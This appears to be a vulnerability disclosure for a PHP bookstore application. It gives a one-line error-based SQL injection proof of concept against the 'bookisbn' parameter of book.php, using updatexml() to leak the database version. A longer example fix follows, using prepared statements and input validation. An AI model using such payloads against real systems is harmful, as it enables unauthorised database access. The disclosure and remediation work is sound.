Open
Description
version: 1.0
No login required.
POC:
http://127.0.0.1:8888/book.php?bookisbn=1' or updatexml(1,concat(0x7e,(version())),0) -- a
View source code book.php

suggest: Please filter the input of the parameter "bookisbn".
author: zionlab@dbappsecurity.com.cn
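
One way to apply the suggested fix, as an added example that is not the project's own book.php and not code from the report: validate the `bookisbn` value, bind it in a prepared statement, and keep SQL errors out of the response, since the PoC above reads data through the `updatexml()` error message. The table and column names (`books`, `book_isbn`, `book_title`), the connection settings and the accepted ISBN shapes are assumptions.

```php
<?php
// Added example (assumed schema: table `books`, columns `book_isbn`, `book_title`).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw exceptions instead of echoing SQL errors
ini_set('display_errors', '0'); // error-based payloads such as updatexml() need visible errors

/** Accept only ISBN-10 / ISBN-13 shapes: digits, optional hyphens, optional trailing X. */
function valid_isbn(string $s): bool
{
    if (!preg_match('/\A[0-9Xx-]{10,17}\z/', $s)) {
        return false;
    }
    $digits = str_replace('-', '', $s);
    return (bool) preg_match('/\A(?:\d{9}[\dXx]|\d{13})\z/', $digits);
}

function find_book(mysqli $db, string $isbn): ?array
{
    // The value is bound as data, so quotes and SQL functions in it are never parsed as SQL.
    $stmt = $db->prepare('SELECT * FROM books WHERE book_isbn = ?');
    $stmt->bind_param('s', $isbn);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$isbn = $_GET['bookisbn'] ?? '';
if (!is_string($isbn) || !valid_isbn($isbn)) { // also rejects bookisbn[]=... arrays
    http_response_code(400);
    exit('Invalid ISBN');
}

try {
    // Placeholder credentials; use a least-privilege account for the application.
    $db = new mysqli('localhost', 'app_user', 'app_password', 'bookstore');
    $book = find_book($db, $isbn);
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage()); // keep database errors in the server log only
    http_response_code(500);
    exit('Internal error');
}

if ($book === null) {
    http_response_code(404);
    exit('Book not found');
}
echo htmlspecialchars($book['book_title'] ?? '', ENT_QUOTES, 'UTF-8');
```

The prepared statement is the actual fix; the format check and error suppression are defence in depth, and the check should be loosened if the application stores identifiers that are not strict ISBNs.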